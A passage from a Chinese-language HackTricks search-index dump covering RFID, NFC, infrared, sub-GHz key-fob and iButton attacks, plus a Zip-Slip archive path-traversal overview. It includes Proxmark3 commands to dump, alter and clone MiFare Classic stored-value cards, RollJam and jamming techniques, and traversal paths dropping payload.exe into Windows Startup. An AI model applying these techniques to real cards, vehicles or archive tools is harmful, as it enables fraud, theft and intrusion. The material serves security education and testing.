通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Pentesting RFID » Pentesting RFID","id":"10326","title":"Pentesting RFID"},"10327":{"body":"Radio Frequency Identification (RFID) 是最常见的短距离无线方案。它通常用于存储和传输用于识别实体的信息。 RFID 标签可以依赖于 自身电源(active) ,例如内置电池,或者通过读取天线使用接收无线电波所感应的电流来获取电源( passive )。","breadcrumbs":"Radio Hacking » Pentesting RFID » 介绍","id":"10327","title":"介绍"},"10328":{"body":"EPCglobal 将 RFID 标签分为六类。每一类标签都具有前一类中列出的所有功能,从而实现向后兼容。 Class 0 标签是运行在 UHF 频段的 被动 标签。厂商在生产时 预编程 它们。因此,你 无法更改 存储在其内存中的信息。 Class 1 标签也可以在 HF 频段工作。此外,它们可以在生产后 一次性写入 。许多 Class 1 标签还能处理它们接收命令的 循环冗余校验(CRCs) 。CRC 是命令末尾用于错误检测的几个额外字节。 Class 2 标签可以 多次写入 。 Class 3 标签可以包含可以记录环境参数(例如当前温度或标签运动)的 嵌入式传感器 。这些标签是 半被动 的,因为尽管它们 有 嵌入式电源(例如集成 电池 ),但它们 不能主动 与其他标签或读卡器发起无线 通信 。 Class 4 标签可以与同一类的其他标签发起通信,使其成为 主动标签 。 Class 5 标签可以为其他标签 提供电力并与之前所有的标签类通信 。Class 5 标签可以充当 RFID readers 。","breadcrumbs":"Radio Hacking » Pentesting RFID » 分类","id":"10328","title":"分类"},"10329":{"body":"RFID 标签的内存通常存储四类数据:用于识别标签所附实体的 识别数据 (此数据包含用户定义字段,如银行账户);提供有关实体 更多细节 的 补充数据 ;用于标签内部 配置 的 控制数据 ;以及包含标签唯一标识符( UID )和有关标签 生产 、 类型 和 供应商 的详细信息的 制造商数据 。前两类数据在所有商业标签中都能找到;后两类则可能因标签供应商而异。 ISO 标准指定了 Application Family Identifier( AFI )的值,这是一个指示标签所属 对象类型 的代码。另一个由 ISO 指定的重要寄存器是 Data Storage Format Identifier( DSFID ),它定义了 用户数据的逻辑组织 。 大多数 RFID 安全控制 具有限制对每个用户内存块以及包含 AFI 和 DSFID 值的特殊寄存器的 读 或 写 操作的机制。这些 锁定机制 使用存储在控制内存中的数据,并由供应商预配置 默认密码 ,但允许标签所有者 配置自定义密码 。","breadcrumbs":"Radio Hacking » Pentesting RFID » RFID 标签中存储的信息","id":"10329","title":"RFID 标签中存储的信息"},"1033":{"body":"This House is Haunted: a decade old RCE in the AION client (housing Lua VM) Bytecode Breakdown: Unraveling Factorio\'s Lua Security Flaws lua-l (2009): Discussion on dropping the bytecode verifier Exploiting Lua 5.1 bytecode (gist with verifier bypasses/notes) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert 
(AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Lua Sandbox Escape » References","id":"1033","title":"References"},"10330":{"body":"","breadcrumbs":"Radio Hacking » Pentesting RFID » 低频与高频标签比较","id":"10330","title":"低频与高频标签比较"},"10331":{"body":"低频标签 常用于 不需要高安全性 的系统:楼宇门禁、对讲钥匙、健身房会员卡等。由于它们的读距较大,因此在付费停车场非常方便:驾驶员不需要将卡靠近读卡器,因为它可以从较远处被触发。与此同时,低频标签非常原始,数据传输速率低。因此,无法为诸如余额保持和加密等功能实现复杂的双向数据传输。低频标签只传输它们的短 ID,且没有任何身份验证手段。 这些设备依赖于 被动 的 RFID 技术并在 30 kHz 到 300 kHz 的范围内工作,尽管更常用的是 125 kHz 到 134 kHz: 远距离 — 更低的频率意味着更高的读距。有些 EM-Marin 和 HID 的读卡器可以在约一米的距离工作。这些通常用于停车场。 原始协议 — 由于低数据传输速率,这些标签只能传输其短 ID。在大多数情况下,数据不经过身份验证且不以任何方式保护。只要卡处于读卡器范围内,它就开始传输其 ID。 低安全性 — 这些卡很容易被复制,甚至因为协议的原始性而可能从别人衣袋中被读取。 流行的 125 kHz 协议: EM-Marin — EM4100, EM4102。在独联体地区最流行的协议。由于其简单性和稳定性,可从大约一米处读取。 HID Prox II — 由 HID Global 推出的低频协议。该协议在西方国家更为流行。它更复杂,且该协议的卡和读卡器相对昂贵。 Indala — 非常古老的低频协议,最初由 Motorola 引入,后来被 HID 收购。与前两者相比,你在野外遇到它的可能性较小,因为它正在逐渐被淘汰。 实际上,还有更多低频协议。但它们在物理层上都使用相同的调制,并且可以在某种程度上被视为上述协议的变体。","breadcrumbs":"Radio Hacking » Pentesting RFID » 低频 RFID 标签(125kHz)","id":"10331","title":"低频 RFID 标签(125kHz)"},"10332":{"body":"你可以使用 Flipper Zero 攻击这些标签: FZ - 125kHz RFID","breadcrumbs":"Radio Hacking » Pentesting RFID » 攻击","id":"10332","title":"攻击"},"10333":{"body":"高频标签 用于需要加密、大量双向数据传输、身份验证等更复杂的读写器-标签交互场景。 它们通常出现在银行卡、公共交通和其他安全通行证中。 13.56 MHz 高频标签是一组标准和协议 。它们通常被称为 NFC ,但这并非总是准确。物理和逻辑层上使用的基本协议集是 ISO 14443。高级协议以及替代标准(如 ISO 19092)基于它。许多人将这项技术称为 Near Field Communication (NFC) ,这是一个描述在 13.56 MHz 频率上运行设备的术语。 简单来说,NFC 的架构如下:传输协议由制造卡的公司选择并基于低层的 ISO 14443 实现。例如,NXP 发明了自己的高级传输协议 Mifare。但在较低层,Mifare 卡基于 ISO 14443-A 标准。 Flipper 可以与低层的 ISO 14443 协议以及 Mifare Ultralight 数据传输协议和用于银行卡的 EMV 进行交互。我们正在努力添加对 Mifare Classic 和 NFC NDEF 的支持。对构成 NFC 的协议和标准的深入考察值得另写一篇文章,我们计划稍后发布。 所有基于 ISO 14443-A 标准的高频卡都有一个唯一的芯片 ID。它充当卡的序列号,就像网络卡的 MAC 地址一样。 通常,UID 长度为 4 或 7 字节 ,但极少数情况下可以 达到 10 字节 。UID 不是秘密,它们很容易被读取, 有时甚至印在卡片上 。 许多门禁系统依赖 UID 来 
进行身份验证并授予访问权限 。有时即使 RFID 标签 支持加密 也会这样使用。这种 误用 使它们在 安全性 上与原始的 125 kHz 卡 处于同一水平。虚拟卡(如 Apple Pay)使用动态 UID,以便手机用户不会通过支付应用打开门禁。 短距离 — 高频非接触卡专门设计为必须将其放在靠近读卡器的位置。这也有助于保护卡片免受未经授权的交互。我们曾实现的最大读取距离约为 15 cm,那还是使用定制的高距离读卡器时的记录。 高级协议 — 高达 424 kbps 的数据传输速率允许复杂协议实现完整的双向数据传输,从而 支持加密 、数据传输等功能。 高安全性 — 高频非接触卡在任何方面都不逊色于智能卡。有些卡支持像 AES 这样的强加密算法并实现非对称加密。","breadcrumbs":"Radio Hacking » Pentesting RFID » 高频 RFID 标签(13.56 MHz)","id":"10333","title":"高频 RFID 标签(13.56 MHz)"},"10334":{"body":"你可以使用 Flipper Zero 攻击这些标签: FZ - NFC 或者使用 proxmark : Proxmark 3","breadcrumbs":"Radio Hacking » Pentesting RFID » 攻击","id":"10334","title":"攻击"},"10335":{"body":"当系统将货币余额直接存储在 MiFare Classic 卡上时,你通常可以操纵它,因为 Classic 使用 NXP 已弃用的 Crypto1 密码算法。Crypto1 多年已被破解,允许使用普通硬件(例如 Proxmark3)恢复扇区密钥并对卡内存进行完全读/写。 端到端工作流程(概述): Dump the original card and recover keys bash # Attempt all built-in Classic key recovery attacks and dump the card\\nhf mf autopwn 这通常会恢复扇区密钥 (A/B),并在 client dumps 文件夹中生成完整卡片 dump。 定位并理解 value/integrity 字段 对原始卡执行合法充值(top-ups),并在充值前后获取多个 dumps。 对两个 dumps 做 diff,以识别表示余额和任何完整性字段的变化的块/字节。 许多 Classic 部署要么使用原生的 \\"value block\\" 编码,要么自定义校验和(例如对余额与另一个字段及常数做 XOR)。在更改余额后,需相应地重新计算完整性字节,并确保所有重复/补码字段一致。 将修改后的 dump 写入可写的 “Chinese magic” Classic tag bash # Load a modified binary dump onto a UID-changeable Classic tag\\nhf mf cload -f modified.bin 克隆原始 UID,使终端识别该卡 bash # Set the UID on a UID-changeable tag (gen1a/gen2 magic)\\nhf mf csetuid -u 在终端使用 信任卡上余额和 UID 的读卡器会接受被篡改的卡。现场观察显示许多部署基于字段宽度对余额进行上限限制(例如 16-bit fixed-point)。 Notes 如果系统使用原生 Classic value blocks,请记住格式:value (4B) + ~value (4B) + value (4B) + block address + ~address。所有部分必须匹配。 对于带简单校验和的自定义格式,差分分析是推导完整性函数而无需反向固件的最快方法。 只有可更改 UID 的标签(\\"Chinese magic\\" gen1a/gen2)允许写入 block 0/UID。普通 Classic 卡的 UID 是只读的。 For hands-on Proxmark3 commands, see: Proxmark 3","breadcrumbs":"Radio Hacking » Pentesting RFID » MiFare Classic offline stored-value tampering (broken Crypto1)","id":"10335","title":"MiFare Classic offline stored-value tampering (broken 
Crypto1)"},"10336":{"body":"如果你在 red-team 演练中需要用来采集 HID Prox® 门禁卡的 长距离 、 电池供电 解决方案,你可以将壁挂式 HID MaxiProx 5375 读卡器改装成一个可装入背包的自包含克隆器。完整的机械和电气拆解请见: Maxiprox Mobile Cloner","breadcrumbs":"Radio Hacking » Pentesting RFID » 制作便携式 HID MaxiProx 125 kHz Mobile Cloner","id":"10336","title":"制作便携式 HID MaxiProx 125 kHz Mobile Cloner"},"10337":{"body":"https://blog.flipperzero.one/rfid/ Let\'s Clone a Cloner – Part 3 (TrustedSec) NXP statement on MIFARE Classic Crypto1 MIFARE security overview (Wikipedia) NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Pentesting RFID » 参考资料","id":"10337","title":"参考资料"},"10338":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Infrared » 红外线","id":"10338","title":"红外线"},"10339":{"body":"红外光对人类是不可见的 。红外波长范围为 0.7到1000微米 。家用遥控器使用红外信号进行数据传输,工作波长范围为0.75..1.4微米。遥控器中的微控制器使红外LED以特定频率闪烁,将数字信号转换为红外信号。 接收红外信号使用 光接收器 。它 将红外光转换为电压脉冲 ,这些脉冲已经是 数字信号 。通常,接收器内部有一个 暗光滤波器 ,只允许 所需波长通过 ,并切除噪声。","breadcrumbs":"Radio Hacking » Infrared » 红外线的工作原理","id":"10339","title":"红外线的工作原理"},"1034":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Archive Extraction Path Traversal » Archive Extraction Path Traversal (\\"Zip-Slip\\" / WinRAR CVE-2025-8088)","id":"1034","title":"Archive Extraction Path Traversal (\\"Zip-Slip\\" / WinRAR CVE-2025-8088)"},"10340":{"body":"红外协议在三个因素上有所不同: 位编码 数据结构 载波频率——通常在36..38 kHz范围内 位编码方式 1. 脉冲间距编码 通过调制脉冲之间的间隔持续时间来编码位。脉冲本身的宽度是恒定的。 2. 脉冲宽度编码 通过调制脉冲宽度来编码位。脉冲爆发后的间隔宽度是恒定的。 3. 相位编码 也称为曼彻斯特编码。逻辑值由脉冲爆发与间隔之间的过渡极性定义。“间隔到脉冲爆发”表示逻辑“0”,“脉冲爆发到间隔”表示逻辑“1”。 4. 
之前编码方式的组合及其他特殊方式 tip 有些红外协议 试图成为多种设备的通用协议 。最著名的有RC5和NEC。不幸的是,最著名 并不意味着最常见 。在我的环境中,我只遇到过两个NEC遥控器,而没有RC5的。 制造商喜欢使用自己独特的红外协议,即使在同一类设备(例如,电视盒)中也是如此。因此,不同公司的遥控器,有时甚至是同一公司的不同型号,无法与同类设备配合使用。","breadcrumbs":"Radio Hacking » Infrared » 红外协议的多样性","id":"10340","title":"红外协议的多样性"},"10341":{"body":"查看遥控器红外信号的最可靠方法是使用示波器。它不会解调或反转接收到的信号,而是“原样”显示。这对于测试和调试非常有用。我将以NEC红外协议为例展示预期信号。 通常,编码数据包的开头有一个前导码。这使接收器能够确定增益和背景水平。也有没有前导码的协议,例如,夏普。 然后传输数据。结构、前导码和位编码方法由特定协议决定。 NEC红外协议 包含一个短命令和一个重复码,在按下按钮时发送。命令和重复码在开头都有相同的前导码。 NEC 命令 除了前导码外,还由一个地址字节和一个命令编号字节组成,设备通过这些字节理解需要执行的操作。地址和命令编号字节用反向值进行重复,以检查传输的完整性。命令末尾有一个额外的停止位。 重复码 在前导码后有一个“1”,这是一个停止位。 对于 逻辑“0”和“1” ,NEC使用脉冲间距编码:首先传输一个脉冲爆发,然后是一个暂停,其长度设置位的值。","breadcrumbs":"Radio Hacking » Infrared » 探索红外信号","id":"10341","title":"探索红外信号"},"10342":{"body":"与其他遥控器不同, 空调不仅仅传输按下按钮的代码 。它们还 在按下按钮时传输所有信息 ,以确保 空调和遥控器同步 。 这将避免将设置为20ºC的机器在使用一个遥控器时增加到21ºC,然后当使用另一个仍将温度设置为20ºC的遥控器进一步增加温度时,它会“增加”到21ºC(而不是22ºC,认为它在21ºC)。","breadcrumbs":"Radio Hacking » Infrared » 空调","id":"10342","title":"空调"},"10343":{"body":"您可以使用Flipper Zero攻击红外线: FZ - Infrared","breadcrumbs":"Radio Hacking » Infrared » 攻击与攻防研究","id":"10343","title":"攻击与攻防研究"},"10344":{"body":"最近的学术研究(EvilScreen,2022)表明, 结合红外和蓝牙或Wi-Fi的多通道遥控器可以被滥用以完全劫持现代智能电视 。该攻击链将高权限的红外服务代码与经过身份验证的蓝牙数据包结合在一起,绕过通道隔离,允许任意应用程序启动、麦克风激活或在没有物理访问的情况下恢复出厂设置。来自不同供应商的八款主流电视——包括声称符合ISO/IEC 27001标准的三星型号——被确认存在漏洞。缓解措施需要供应商的固件修复或完全禁用未使用的红外接收器。","breadcrumbs":"Radio Hacking » Infrared » 智能电视/机顶盒接管(EvilScreen)","id":"10344","title":"智能电视/机顶盒接管(EvilScreen)"},"10345":{"body":"安全摄像头、路由器甚至恶意USB闪存驱动器通常包括 夜视红外LED 。研究表明,恶意软件可以调制这些LED(<10–20 kbit/s,使用简单的OOK)以 通过墙壁和窗户外泄秘密 到放置在数十米外的外部摄像头。由于光线在可见光谱之外,操作员很少注意到。对策: 在敏感区域物理屏蔽或移除红外LED 监控摄像头LED的占空比和固件完整性 在窗户和监控摄像头上部署红外切割滤光片 攻击者还可以使用强大的红外投影仪通过闪烁数据向不安全的摄像头 渗透 命令。","breadcrumbs":"Radio Hacking » Infrared » 通过红外LED进行空气间隔数据外泄(aIR-Jumper家族)","id":"10345","title":"通过红外LED进行空气间隔数据外泄(aIR-Jumper家族)"},"10346":{"body":"固件1.0(2024年9月)增加了 数十种额外的红外协议和可选的外部放大模块 
。结合通用遥控器的暴力破解模式,Flipper可以在高功率二极管的帮助下,从最多30米的距离禁用或重新配置大多数公共电视/空调。","breadcrumbs":"Radio Hacking » Infrared » 使用Flipper Zero 1.0进行远程暴力破解和扩展协议","id":"10346","title":"使用Flipper Zero 1.0进行远程暴力破解和扩展协议"},"10347":{"body":"","breadcrumbs":"Radio Hacking » Infrared » 工具与实用示例","id":"10347","title":"工具与实用示例"},"10348":{"body":"Flipper Zero – 便携式收发器,具有学习、重放和字典暴力破解模式(见上文)。 Arduino / ESP32 + 红外LED / TSOP38xx接收器 – 便宜的DIY分析仪/发射器。与Arduino-IRremote库结合使用(v4.x支持>40种协议)。 逻辑分析仪 (Saleae/FX2) – 在协议未知时捕获原始时序。 带红外发射器的智能手机 (例如,小米) – 快速现场测试,但范围有限。","breadcrumbs":"Radio Hacking » Infrared » 硬件","id":"10348","title":"硬件"},"10349":{"body":"Arduino-IRremote – 积极维护的C++库: cpp #include \\nIRsend sender;\\nvoid setup(){ sender.begin(); }\\nvoid loop(){\\nsender.sendNEC(0x20DF10EF, 32); // 三星电视电源\\ndelay(5000);\\n} IRscrutinizer / AnalysIR – GUI解码器,导入原始捕获并自动识别协议 + 生成Pronto/Arduino代码。 LIRC / ir-keytable(Linux) – 从命令行接收和注入红外: bash sudo ir-keytable -p nec,rc5 -t # 实时转储解码的扫描代码\\nirsend SEND_ONCE samsung KEY_POWER","breadcrumbs":"Radio Hacking » Infrared » 软件","id":"10349","title":"软件"},"1035":{"body":"许多归档格式(ZIP、RAR、TAR、7-ZIP等)允许每个条目携带其自己的 内部路径 。当提取工具盲目地尊重该路径时,包含..或 绝对路径 (例如C:\\\\Windows\\\\System32\\\\)的构造文件名将被写入用户选择的目录之外。 这种类型的漏洞被广泛称为 Zip-Slip 或 归档提取路径遍历 。 后果从覆盖任意文件到通过在 自动运行 位置(如Windows 启动 文件夹)放置有效载荷直接实现 远程代码执行(RCE) 。","breadcrumbs":"Archive Extraction Path Traversal » 概述","id":"1035","title":"概述"},"10350":{"body":"在不需要时禁用或覆盖公共场所部署设备上的红外接收器。 强制智能电视和遥控器之间的 配对 或加密检查;隔离特权“服务”代码。 在机密区域周围部署红外切割滤光片或连续波探测器,以打破光学隐蔽通道。 监控暴露可控红外LED的摄像头/物联网设备的固件完整性。","breadcrumbs":"Radio Hacking » Infrared » 防御措施","id":"10350","title":"防御措施"},"10351":{"body":"Flipper Zero红外博客文章 EvilScreen:通过遥控器模仿劫持智能电视(arXiv 2210.03014) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Infrared » 参考文献","id":"10351","title":"参考文献"},"10352":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Sub-GHz RF","id":"10352","title":"Sub-GHz RF"},"10353":{"body":"车库门开启器通常在300-190 MHz范围内工作,最常见的频率为300 MHz、310 MHz、315 MHz和390 MHz。这个频率范围通常用于车库门开启器,因为它比其他频段更不拥挤,并且不太可能受到其他设备的干扰。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Garage Doors","id":"10353","title":"Garage Doors"},"10354":{"body":"大多数汽车钥匙遥控器工作在 315 MHz或433 MHz 。这两者都是无线电频率,广泛用于不同的应用。两个频率之间的主要区别是433 MHz的范围比315 MHz更长。这意味着433 MHz更适合需要更长范围的应用,例如远程无钥匙进入。 在欧洲,常用433.92MHz,而在美国和日本则是315MHz。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Car Doors","id":"10354","title":"Car Doors"},"10355":{"body":"如果不将每个代码发送5次(这样发送是为了确保接收器能接收到),而只发送一次,时间将减少到6分钟: 如果你 去掉信号之间的2毫秒等待 时间,你可以 将时间减少到3分钟。 此外,通过使用De Bruijn序列(减少发送所有潜在二进制数字所需的位数的方法),这个 时间仅减少到8秒 : 此攻击的示例已在 https://github.com/samyk/opensesame 中实现。 要求 前导码将避免De Bruijn序列 优化, 滚动代码将防止此攻击 (假设代码足够长,不易被暴力破解)。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Brute-force Attack","id":"10355","title":"Brute-force Attack"},"10356":{"body":"要攻击这些信号,请使用Flipper Zero检查: FZ - Sub-GHz","breadcrumbs":"Radio Hacking » Sub-GHz RF » Sub-GHz Attack","id":"10356","title":"Sub-GHz Attack"},"10357":{"body":"自动车库门开启器通常使用无线遥控器来打开和关闭车库门。遥控器 发送无线电频率(RF)信号 到车库门开启器,激活电机以打开或关闭门。 有人可能会使用称为代码抓取器的设备来拦截RF信号并记录以备后用。这被称为 重放攻击 。为了防止这种攻击,许多现代车库门开启器使用一种更安全的加密方法,称为 滚动代码 系统。 RF信号通常使用滚动代码传输 ,这意味着代码在每次使用时都会更改。这使得 拦截 信号并 利用 它获得 未经授权 访问车库变得 困难 。 在滚动代码系统中,遥控器和车库门开启器有一个 共享算法 ,每次使用遥控器时 生成一个新代码 。车库门开启器只会对 正确代码 做出响应,这使得仅通过捕获代码就获得未经授权的访问变得更加困难。","breadcrumbs":"Radio Hacking » 
Sub-GHz RF » Rolling Codes Protection","id":"10357","title":"Rolling Codes Protection"},"10358":{"body":"基本上,你监听按钮并 在遥控器超出设备范围时捕获信号 (比如汽车或车库)。然后你移动到设备并 使用捕获的代码打开它 。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Missing Link Attack","id":"10358","title":"Missing Link Attack"},"10359":{"body":"攻击者可以 在车辆或接收器附近干扰信号 ,使得 接收器无法真正“听到”代码 ,一旦发生这种情况,你可以简单地 捕获并重放 代码,当你停止干扰时。 受害者在某个时刻会使用 钥匙锁定汽车 ,但攻击者将 记录足够的“关门”代码 ,希望能够重新发送以打开门(可能需要 更改频率 ,因为有些汽车使用相同的代码来打开和关闭,但在不同频率下监听两个命令)。 warning 干扰有效 ,但很明显,因为如果 锁车的人只是测试车门 以确保它们被锁定,他们会注意到汽车未锁。此外,如果他们意识到这种攻击,他们甚至可以听到车门在按下“锁定”按钮时没有发出锁定 声音 ,或者汽车的 灯光 在按下“锁定”按钮时没有闪烁。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Full Link Jamming Attack","id":"10359","title":"Full Link Jamming Attack"},"1036":{"body":"攻击者创建一个归档,其中一个或多个文件头包含: 相对遍历序列(..\\\\..\\\\..\\\\Users\\\\\\\\victim\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\payload.exe) 绝对路径(C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\payload.exe) 受害者使用一个信任嵌入路径而不是对其进行清理或强制在所选目录下提取的易受攻击工具提取归档。 文件被写入攻击者控制的位置,并在系统或用户下次触发该路径时执行/加载。","breadcrumbs":"Archive Extraction Path Traversal » 根本原因","id":"1036","title":"根本原因"},"10360":{"body":"这是一种更 隐蔽的干扰技术 。攻击者将干扰信号,因此当受害者尝试锁门时将无法工作,但攻击者会 记录此代码 。然后,受害者将 再次尝试锁定汽车 ,按下按钮,汽车将 记录第二个代码 。 紧接着, 攻击者可以发送第一个代码 ,然后 汽车将锁定 (受害者会认为第二次按下锁定了)。然后,攻击者将能够 发送第二个被盗代码以打开 汽车(假设**“关车”代码也可以用来打开它**)。可能需要更改频率(因为有些汽车使用相同的代码来打开和关闭,但在不同频率下监听两个命令)。 攻击者可以 干扰汽车接收器而不是他的接收器 ,因为如果汽车接收器在例如1MHz宽带中监听,攻击者不会 干扰 遥控器使用的确切频率,而是 在该频谱中接近的频率 ,同时 攻击者的接收器将在更小的范围内监听 ,以便在没有干扰信号的情况下监听遥控信号。 warning 其他实施方案在规格中显示, 滚动代码是发送的总代码的一部分 。即发送的代码是一个 24位密钥 ,其中前 12位是滚动代码 , 第二个8位是命令 (如锁定或解锁),最后4位是 校验和 。实施这种类型的车辆也自然容易受到攻击,因为攻击者只需替换滚动代码段即可 在两个频率上使用任何滚动代码 。 caution 请注意,如果受害者在攻击者发送第一个代码时发送第三个代码,则第一个和第二个代码将失效。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Code Grabbing Attack ( aka ‘RollJam’ )","id":"10360","title":"Code Grabbing Attack ( aka ‘RollJam’ )"},"10361":{"body":"针对安装在汽车上的后市场滚动代码系统进行测试, 立即发送相同的代码两次 会 
激活警报 和防盗装置,提供了一个独特的 拒绝服务 机会。讽刺的是, 禁用警报 和防盗装置的方法是 按下 遥控器,这使得攻击者能够 持续执行DoS攻击 。或者将此攻击与 前一个攻击混合以获取更多代码 ,因为受害者希望尽快停止攻击。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Alarm Sounding Jamming Attack","id":"10361","title":"Alarm Sounding Jamming Attack"},"10362":{"body":"https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/ https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/ https://samy.pl/defcon2015/ https://hackaday.io/project/164566-how-to-hack-a-car/details tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Sub-GHz RF » References","id":"10362","title":"References"},"10363":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » iButton » iButton","id":"10363","title":"iButton"},"10364":{"body":"iButton 是一种电子识别密钥的通用名称,装在一个 硬币形状的金属容器 中。它也被称为 Dallas Touch Memory 或接触式存储器。尽管它常常被错误地称为“磁性”密钥,但里面 没有任何磁性 。实际上,里面隐藏着一个完整的 微芯片 ,它在数字协议上运行。","breadcrumbs":"Radio Hacking » iButton » Intro","id":"10364","title":"Intro"},"10365":{"body":"通常,iButton 指的是密钥和读卡器的物理形式 - 一个带有两个接触点的圆形硬币。对于其周围的框架,有许多变体,从最常见的带孔塑料支架到戒指、挂件等。 当密钥接触到读卡器时, 接触点接触 ,密钥被供电以 传输 其 ID。有时密钥 不会立即被读取 ,因为 对讲机的接触 PSD 较大 。因此,密钥和读卡器的外轮廓无法接触。如果是这种情况,您需要将密钥按在读卡器的一个侧面上。","breadcrumbs":"Radio Hacking » iButton » What is iButton?","id":"10365","title":"What is iButton?"},"10366":{"body":"Dallas 密钥使用 1-wire 协议交换数据。仅用一个接触点进行数据传输 (!!),双向传输,从主设备到从设备,反之亦然。1-wire 协议按照主从模型工作。在这种拓扑中,主设备始终发起通信,从设备遵循其指令。 当密钥(从设备)接触到对讲机(主设备)时,密钥内部的芯片开启,由对讲机供电,密钥被初始化。随后,对讲机请求密钥 ID。接下来,我们将更详细地查看这个过程。 Flipper 可以在主模式和从模式下工作。在密钥读取模式下,Flipper 充当读卡器,也就是说它作为主设备工作。而在密钥仿真模式下,Flipper 假装是一个密钥,处于从模式。","breadcrumbs":"Radio Hacking » iButton » 1-Wire protocol","id":"10366","title":"1-Wire protocol"},"10367":{"body":"有关这些密钥如何工作的更多信息,请查看页面 https://blog.flipperzero.one/taming-ibutton/","breadcrumbs":"Radio Hacking » iButton » Dallas, Cyfral & Metakom keys","id":"10367","title":"Dallas, Cyfral & Metakom keys"},"10368":{"body":"iButtons 可以通过 Flipper Zero 进行攻击: FZ - iButton","breadcrumbs":"Radio Hacking » iButton » Attacks","id":"10368","title":"Attacks"},"10369":{"body":"https://blog.flipperzero.one/taming-ibutton/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
